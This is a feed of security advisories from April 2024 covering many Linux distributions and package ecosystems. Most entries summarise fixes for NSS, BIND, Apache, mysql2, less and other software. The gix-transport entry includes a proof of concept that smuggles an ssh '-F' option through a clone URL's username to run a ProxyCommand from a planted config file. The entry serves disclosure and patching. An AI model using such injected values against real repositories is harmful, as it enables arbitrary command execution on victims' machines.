11.04.2024 21:18:01	ubuntu	[USN-6727-2] NSS regression	USN-6727-1 introduced a regression in NSS.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6727-2
11.04.2024 19:19:44	ubuntu	[USN-6729-1] Apache HTTP Server vulnerabilities	Several security issues were fixed in Apache HTTP Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6729-1
11.04.2024 14:13:39	ubuntu	[USN-6728-2] Squid regression	USN-6728-1 introduced a regression in Squid.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6728-2
11.04.2024 03:00:00	cisa	[CISA-2024:0411] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0411
11.04.2024 03:00:00	debian	[DSA-5656-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5656-1
11.04.2024 03:00:00	redhat	[RHSA-2024:1784] gnutls security update (moderate)	The gnutls package provide the GNU Transport Layer Security (GnuTLS) library,which implements cryptographic algorithms and protocols such as SSL, TLS, andDTLS.This package update fixes a timing side-channel in deterministic ECDSA.Security Fix(es):* gnutls: vulnerable to Minerva side-channel information leak (CVE-2024-28834)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1784
11.04.2024 03:00:00	redhat	[RHSA-2024:1786] httpd:2.4/mod_http2 security update (important)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: mod_http2: CONTINUATION frames DoS (CVE-2024-27316)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1786
11.04.2024 03:00:00	redhat	[RHSA-2024:1785] X.Org server security update (important)	X.Org is an open-source implementation of the X Window System. It provides thebasic low-level functionality that full-fledged graphical user interfaces aredesigned upon.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: User-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1785
11.04.2024 03:00:00	redhat	[RHSA-2024:1787] squid security update (important)	Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: denial of service in HTTP header parser (CVE-2024-25617)* squid: denial of service in HTTP request parsing (CVE-2023-50269)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1787
11.04.2024 03:00:00	redhat	[RHSA-2024:1751] unbound security update (important)	The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver.Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. The default combination of the "control-use-cert: no" option with either explicit or implicit use of an IP address in the "control-interface" option could allow improper access. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged local process to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file "/etc/unbound/conf.d/remote-control.conf" has been added and included in the main unbound configuration file, "unbound.conf". The file contains two directives that should limit access to unbound.conf: control-interface: "/run/unbound/control" control-use-cert: "yes"For details about these directives, run "man unbound.conf".Updating to the version of unbound provided by this advisory should, in most cases, address the vulnerability. To verify that your configuration is not vulnerable, use the "unbound-control status \| grep control" command. If the output contains "control(ssl)" or "control(namedpipe)", your configuration is not vulnerable. If the command output returns only "control", the configuration is vulnerable because it does not enforce access only to the unbound group members. To fix your configuration, add the line "include: /etc/unbound/conf.d/remote-control.conf" to the end of the file "/etc/unbound/unbound.conf". If you use a custom "/etc/unbound/conf.d/remote-control.conf" file, add the new directives to this file. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1751
11.04.2024 03:00:00	redhat	[RHSA-2024:1781] bind9.16 security update (important)	The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)* bind9: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)* bind9: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)* bind9: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1781
11.04.2024 03:00:00	redhat	[RHSA-2024:1789] bind security update (important)	The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)* bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)* bind: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)* bind: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)* bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1789
11.04.2024 03:00:00	freebsd	[FREEBSD:DAD6294C-F7C1-11EE-BB77-001B217B3468] Gitlab -- Patch Release: 16.10.2, 16.9.4, 16.8.6	Gitlab reports: Stored XSS injected in diff viewer Stored XSS via autocomplete results Redos on Integrations Chat Messages Redos During Parse Junit Test Report	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:DAD6294C-F7C1-11EE-BB77-001B217B3468
11.04.2024 23:13:40	maven	[MAVEN:GHSA-66J8-C83M-GJ5F] Apache Zeppelin remote code execution by adding malicious JDBC connection string (critical)	Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin.The attacker can inject sensitive configuration or malicious code when connecting MySQL database via JDBC driver. This issue affects Apache Zeppelin: before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-66J8-C83M-GJ5F
11.04.2024 23:13:14	maven	[MAVEN:GHSA-RRVF-5W4R-3X7V] Apache Zeppelin vulnerable to cross-site scripting in the helium module (moderate)	Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.Attackers can modify `helium.json` and perform cross-site scripting attacks on normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RRVF-5W4R-3X7V
11.04.2024 03:00:00	freebsd	[FREEBSD:7C217849-F7D7-11EE-A490-84A93843EB75] OpenSSL -- Unbounded memory growth with session handling in TLSv1.3	The OpenSSL project reports: Some non-default TLS server configurations can cause unbounded memory growth when processing TLSv1.3 sessions	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:7C217849-F7D7-11EE-A490-84A93843EB75
11.04.2024 03:00:00	freebsd	[FREEBSD:C092BE0E-F7CC-11EE-AA6B-B42E991FC52E] forgejo -- HTTP/2 CONTINUATION flood in net/http	security@golang.org reports: An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C092BE0E-F7CC-11EE-AA6B-B42E991FC52E
11.04.2024 19:16:20	rustsec	[RUSTSEC-2024-0332] Degradation of service in h2 servers with CONTINUATION Flood	An attacker can send a flood of CONTINUATION frames, causing `h2` to process them indefinitely.This results in an increase in CPU usage.Tokio task budget helps prevent this from a complete denial-of-service, as the server can stillrespond to legitimate requests, albeit with increased latency.More details at "https://seanmonstar.com/blog/hyper-http2-continuation-flood/.Patches available for 0.4.x and 0.3.x versions.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0332
12.04.2024 22:36:41	slackware	[SSA:2024-103-01] php (medium)	New php packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```extra/php81/php81-8.1.28-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Command injection via array-ish $command parameter of XXXXXXXXX. __Host-/__Secure- cookie bypass due to partial CVE-2022-31629 fix. Password_verify can erroneously return true, opening ATO risk. For more information, see: https://www.php.net/ChangeLog-8.php#8.1.28 https://www.cve.org/CVERecord?id=CVE-2024-1874 https://www.cve.org/CVERecord?id=CVE-2024-2756 https://www.cve.org/CVERecord?id=CVE-2024-3096 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/php81/php81-8.1.28-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/php81/php81-8.1.28-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-8.3.6-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-8.3.6-x86_64-1.txzMD5 signaturesSlackware 15.0 package:912a70b605290d9fa79ac11089f232f3 php81-8.1.28-i586-1_slack15.0.txzSlackware x86_64 15.0 package:bbf7d8260161db99e343e17ae6c52bd9 php81-8.1.28-x86_64-1_slack15.0.txzSlackware -current package:598fd38d4ec67d5dd6c8913b16e5ca6f n/php-8.3.6-i586-1.txzSlackware x86_64 -current package:03bbdf7c6e708ce44e19740728cf2849 n/php-8.3.6-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg php81-8.1.28-i586-1_slack15.0.txz `Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-103-01
13.04.2024 00:26:31	maven	[MAVEN:GHSA-79VV-VP32-GPP7] Apache Kafka: Potential incorrect access control during migration from ZK mode to KRaft mode (moderate)	While an Apache Kafka cluster is being migrated from ZooKeeper mode to KRaft mode, in some cases ACLs will not be correctly enforced.Two preconditions are needed to trigger the bug:1. The administrator decides to remove an ACL2. The resource associated with the removed ACL continues to have two or more other ACLs associated with it after the removal.When those two preconditions are met, Kafka will treat the resource as if it had only one ACL associated with it after the removal, rather than the two or more that would be correct.The incorrect condition is cleared by removing all brokers in ZK mode, or by adding a new ACL to the affected resource. Once the migration is completed, there is no metadata loss (the ACLs all remain).The full impact depends on the ACLs in use. If only ALLOW ACLs were configured during the migration, the impact would be limited to availability impact. if DENY ACLs were configured, the impact could include confidentiality and integrity impact depending on the ACLs configured, as the DENY ACLs might be ignored due to this vulnerability during the migration period.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-79VV-VP32-GPP7
12.04.2024 20:11:15	almalinux	[ALSA-2024:1782] bind and dhcp security update (important)	bind and dhcp security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1782
12.04.2024 03:00:00	cisa	[CISA-2024:0412] CISA Adds One Known Exploited Vulnerability to Catalog (critical)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0412
12.04.2024 03:00:00	debian	[DSA-5657-1] xorg-server (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5657-1
12.04.2024 03:00:00	redhat	[RHSA-2024:1782] bind and dhcp security update (important)	The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.Security Fix(es):* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1782
12.04.2024 16:50:59	npm	[NPM:GHSA-FPW7-J2HG-69V5] mysql2 Remote Code Execution (RCE) via the readCodeFor function (critical)	Versions of the package mysql2 before 3.9.4 are vulnerable to Remote Code Execution (RCE) via the `readCodeFor` function due to improper validation of the `supportBigNumbers` and `bigNumberStrings` values.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FPW7-J2HG-69V5
12.04.2024 21:08:38	npm	[NPM:GHSA-4WH3-3WF2-39M9] Summernote vulnerable to cross-site scripting (moderate)	Cross Site Scripting vulnerability in Summernote v.0.8.18 and before allows a remote attacker to execute arbtirary code via a crafted payload to the `codeview` parameter.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4WH3-3WF2-39M9
12.04.2024 14:48:21	almalinux	[ALSA-2024:1784] gnutls security update (moderate)	gnutls security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1784
12.04.2024 16:00:18	almalinux	[ALSA-2024:1786] httpd:2.4/mod_http2 security update (important)	httpd:2.4/mod_http2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1786
12.04.2024 14:50:26	almalinux	[ALSA-2024:1751] unbound security update (important)	unbound security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1751
12.04.2024 21:44:24	almalinux	[ALSA-2024:1781] bind9.16 security update (important)	bind9.16 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1781
12.04.2024 15:58:56	almalinux	[ALSA-2024:1789] bind security update (important)	bind security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1789
12.04.2024 16:50:13	npm	[NPM:GHSA-49J4-86M8-Q2JW] mysql2 vulnerable to Prototype Poisoning (moderate)	Versions of the package mysql2 before 3.9.4 are vulnerable to Prototype Poisoning due to insecure results object creation and improper user input sanitization passed through `parserFn` in `text_parser.js` and `binary_parser.js`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-49J4-86M8-Q2JW
12.04.2024 16:49:53	npm	[NPM:GHSA-MQR2-W7WJ-JJGR] mysql2 cache poisoning vulnerability (moderate)	Versions of the package mysql2 before 3.9.3 are vulnerable to Improper Input Validation through the `keyFromFields` function, resulting in cache poisoning. An attacker can inject a colon `:` character within a value of the attacker-crafted key.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MQR2-W7WJ-JJGR
12.04.2024 14:51:36	almalinux	[ALSA-2024:1750] unbound security update (important)	unbound security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1750
12.04.2024 19:29:46	rustsec	[RUSTSEC-2024-0333] `rsa-export` is unmaintained	This crate has been deprecated in favour of using the native support for exporting RSA keys into the standard PEM format. See [docs.rs documentation].In addition to that, the operations in this crate (arithmetic and Base64 encoding) are not done in constant-time, potentially [exposing the user to sidechannel attacks].[docs.rs documentation]: https://docs.rs/rsa/0.9.6/rsa/index.html#pkcs8-rsa-key-encoding[exposing the user to sidechannel attacks]: https://arxiv.org/pdf/2108.04600.pdf	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0333
12.04.2024 19:31:39	rustsec	[RUSTSEC-2024-0334] `libp2p-tokio-socks5` is unmaintained	Note the repository was archived without an issue so we link directlyto the commit that marked the repository as unmaintained.To the best of the original authors knowledge the crate has novulnerabilities as of the last release, it is just unmaintained due tolaziness - new maintainer welcome.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0334
13.04.2024 03:00:00	debian	[DSA-5658-1] linux (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5658-1
13.04.2024 20:16:35	rustsec	[RUSTSEC-2024-0335] gix-transport indirect code execution via malicious username	### Summary`gix-transport` does not check the username part of a URL for text that the external `ssh` program would interpret as an option. A specially crafted clone URL can smuggle options to SSH. The possibilities are syntactically limited, but if a malicious clone URL is used by an application whose current working directory contains a malicious file, arbitrary code execution occurs.The first `gix` crate with the fix [is version 0.62.0](https://crates.io/crates/gix/0.62.0), and the first fixed `gix` CLI is [version 0.35](https://github.com/Byron/gitoxide/releases/tag/v0.35.0). `gix-transport` [at version v0.42](https://crates.io/crates/gix-transport/0.42.0) is the lowest-level plumbing crate with the fix.### DetailsThis is related to the patched vulnerability [RUSTSEC-2023-0064](https://rustsec.org/advisories/RUSTSEC-2023-0064.html), but appears less severe due to a greater attack complexity. Since <https://github.com/Byron/gitoxide/pull/1032>, `gix-transport` checks the host and path portions of a URL for text that has a `-` in a position that will cause `ssh` to interpret part of all of the URL as an option argument. But it does not check the non-mandatory username portion of the URL.As in Git, when an address is a URL of the form `ssh://username@hostname/path`, or when it takes the special form `username@hostname:dirs/repo`, this is treated as an SSH URL. `gix-transport` will replace some characters in `username` with their `%`-based URL encodings, but otherwise passes `username@hostname` as an argument to the external `ssh` command. This happens even if `username` begins with a hyphen. In that case, `ssh` treats that argument as an option argument, and attempts to interpret and honor it as a sequence of one or more options possibly followed by an operand for the last option.This is harder to exploit than [RUSTSEC-2023-0064](https://rustsec.org/advisories/RUSTSEC-2023-0064.html), because the possibilities are constrained by:- The difficulty of forming an option argument `ssh` accepts, given that characters such as `=`, `/`, and `\`, are URL-encoded, `:` is removed, and the argument passed to `ssh` contains the `@` sign and subsequent host identifier, which in an effective attack must be parseable as a suffix of the operand passed to the last option. The inability to include a literal `=` prevents the use of `-oNAME=VALUE` (e.g., `-oProxyCommand=payload`). The inability to include a literal `/` or `\` prevents smuggling in a path operand residing outside the current working directory, incuding on Windows. (Although a `~` character may be smuggled in, `ssh` does not perform its own tilde expansion, so it does not form an absolute path.)- The difficulty, or perhaps impossibility, of completing a connection (other than when arbitrary code execution has been achieved). This complicates or altogether prevents the use of options such as `-A` and `-X` together with a connection to a real but malicious server. The reason a connection cannot generally be completed when exploiting this vulnerability is that, because the argument `gix-transport` intends as a URL is treated as an option argument, `ssh` treats the subsequent non-option argument `git-upload-pack` as the host instead of the command, but it is not a valid host name. Although `ssh` supports aliases for hosts, even if `git-upload-pack` could be made an alias, that is made difficult by the URL-encoding transformation.However, an attacker who is able to cause a specially named `ssh` configuration file to be placed in the current working directory can smuggle in an `-F` option referencing the file, and this allows arbitrary command execution.This scenario is especially plausible because programs that operate on git repositories are often run in untrusted git repositories, sometimes even to operate on another repository. Situations where this is likely, such that an attacker could predict or arrange it, may for some applications include a malicious repository with a malicious submodule configuration.Other avenues of exploitation exist, but appear to be less severe. For example, the `-E` option can be smuggled to create or append to a file in the current directory (or its target, if it is a symlink). There may also be other significant ways to exploit this that have not yet been discovered, or that would arise with new options in future versions of `ssh`.### PoCTo reproduce the known case that facilitates arbitrary code execution, first create a file in the current directory named `configfile@example.com`, of the form```textProxyCommand payload```where `payload` is a command with an observable side effect. On Unix-like systems, this could be `date \| tee vulnerable` or an `xdg-open`, `open`, or other command command to launch a graphical application. On Windows, this could be the name of a graphical application already in the search path, such as `calc.exe`.(Although the syntax permitted in the value of `ProxyCommand` may vary by platform, this is not limited to running commands in the current directory. That limitation only applies to paths directly smuggled in the username, not to the contents of a separate malicious configuration file. Arbitrary other settings may be specified in `configfile@example.com` as well.)Then run:```shgix clone 'ssh://-Fconfigfile@example.com/abc'```Or:```shgix clone -- '-Fconfigfile@example.com:abc/def'```(The `--` is required to ensure that `gix` is really passing the argument as a URL for use in `gix-transport`, rather than interpreting it as an option itself, which would not necessarily be a vulnerability.)In either case, the payload specified in `configfile@example.com` runs, and its side effect can be observed.Other cases may likewise be produced, in either of the above two forms of SSH addresses. For example, to create or append to the file `errors@example.com`, or to create or append to its target if it is a symlink:```shgix clone 'ssh://-Eerrors@example.com/abc'``````shgix clone -- '-Eerrors@example.com:abc/def'```### ImpactAs in [RUSTSEC-2023-0064](https://rustsec.org/advisories/RUSTSEC-2023-0064.html), this would typically require user interaction to trigger an attempt to clone or otherwise connect using the malicious URL. Furthermore, known means of exploiting this vulnerability to execute arbitrary commands require further preparatory steps to establish a specially named file in the current directory. The impact is therefore expected to be lesser, though it is difficult to predict it with certainty because it is not known exactly what scenarios will arise when using the `gix-transport` library.Users who use applications that make use of `gix-transport` are potentially vulnerable, especially:- On repositories with submodules that are automatically added, depending how the application manages submodules.- When operating on other repositories from inside an untrusted repository.- When reviewing contributions from untrusted developers by checking out a branch from an untrusted fork and performing clones from that location.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0335
14.04.2024 21:39:08	slackware	[SSA:2024-105-01] less	New less packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/less-653-i586-1_slack15.0.txz: Upgraded. This update patches a security issue: less through 653 allows OS command execution via a newline character in the name of a file, because quoting is mishandled in filename.c. Exploitation typically requires use with attacker-controlled file names, such as the files extracted from an untrusted archive. Exploitation also requires the LESSOPEN environment variable, but this is set by default in many common cases. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-32487 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/less-653-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/less-653-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/less-653-i586-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/less-653-x86_64-2.txzMD5 signaturesSlackware 15.0 package:9842df0d8ee0085de310d263a1ae22d3 less-653-i586-1_slack15.0.txzSlackware x86_64 15.0 package:c2097fdbe9a6c2a806dbc33e8168ce00 less-653-x86_64-1_slack15.0.txzSlackware -current package:a6f91c16d33d74e2159c7329fbfcf03f a/less-653-i586-2.txzSlackware x86_64 -current package:060d1dff94545a40f02c517bb55cd2e3 a/less-653-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg less-653-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-105-01
14.04.2024 03:00:00	debian	[DSA-5659-1] trafficserver	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5659-1
15.04.2024 23:25:06	npm	[NPM:GHSA-846G-P7HM-F54R] AWS Amplify CLI has incorrect trust policy management (high)	Amazon AWS Amplify CLI before 12.10.1 incorrectly configures the role trust policy of IAM roles associated with Amplify projects. When the Authentication component is removed from an Amplify project, a Condition property is removed but "Effect":"Allow" remains present, and consequently sts:AssumeRoleWithWebIdentity would be available to threat actors with no conditions. Thus, if Amplify CLI had been used to remove the Authentication component from a project built between August 2019 and January 2024, an "assume role" may have occurred, and may have been leveraged to obtain unauthorized access to an organization's AWS resources. NOTE: the problem could only occur if an authorized AWS user removed an Authentication component. (The vulnerability did not give a threat actor the ability to remove an Authentication component.) However, in realistic situations, an authorized AWS user may have removed an Authentication component, e.g., if the objective were to stop using built-in Cognito resources, or move to a completely different identity provider.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-846G-P7HM-F54R
15.04.2024 19:44:00	ubuntu	[USN-6734-1] libvirt vulnerabilities (medium)	Several security issues were fixed in libvirt.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6734-1
15.04.2024 19:37:17	ubuntu	[USN-6733-1] GnuTLS vulnerabilities (medium)	Several security issues were fixed in GnuTLS.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6733-1
15.04.2024 19:29:45	ubuntu	[USN-6732-1] WebKitGTK vulnerabilities (high)	Several security issues were fixed in WebKitGTK.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6732-1
15.04.2024 13:27:32	ubuntu	[USN-6731-1] YARD vulnerabilities (high)	Several security issues were fixed in yard.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6731-1
15.04.2024 03:00:00	debian	[DSA-5660-1] php7.4 (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5660-1
15.04.2024 03:00:00	debian	[DSA-5661-1] php8.2 (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5661-1
15.04.2024 03:00:00	oraclelinux	[ELSA-2024-1784] gnutls security update (moderate)	[3.6.16-8.3_fips]- Allow RSA keygen with modulus sizes bigger than 3072 bits and validate the seed length as defined in FIPS 186-4 section B.3.2 [Orabug: 33200526]- Allow bigger known RSA modulus sizes when calling rsa_generate_fips186_4_keypair directly [Orabug: 33200526]- Change Epoch from 1 to 10_fips[3.6.16-8.3]- Fix memleak with older GMP (RHEL-28957)[3.6.16-8.2]- Fix timing side-channel in deterministic ECDSA (RHEL-28957)[3.6.16-8.1]- auth/rsa-psk: minimize branching after decryption (RHEL-21586)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1784
17.04.2024 00:25:54	ubuntu	[USN-6726-2] Linux kernel (IoT) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6726-2
16.04.2024 23:56:05	ubuntu	[USN-6725-2] Linux kernel (AWS) vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6725-2
16.04.2024 23:15:09	alpinelinux	[ALPINE:CVE-2022-24809] net-snmp vulnerability (medium)	[From CVE-2022-24809] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-only credentials can use a malformed OID in a `GET-NEXT` to the `nsVacmAccessTable` to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24809
16.04.2024 23:15:09	alpinelinux	[ALPINE:CVE-2022-24810] net-snmp vulnerability (medium)	[From CVE-2022-24810] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can use a malformed OID in a SET to the nsVacmAccessTable to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24810
16.04.2024 23:15:08	alpinelinux	[ALPINE:CVE-2022-24806] net-snmp vulnerability (medium)	[From CVE-2022-24806] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can exploit an Improper Input Validation vulnerability when SETing malformed OIDs in master agent and subagent simultaneously. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24806
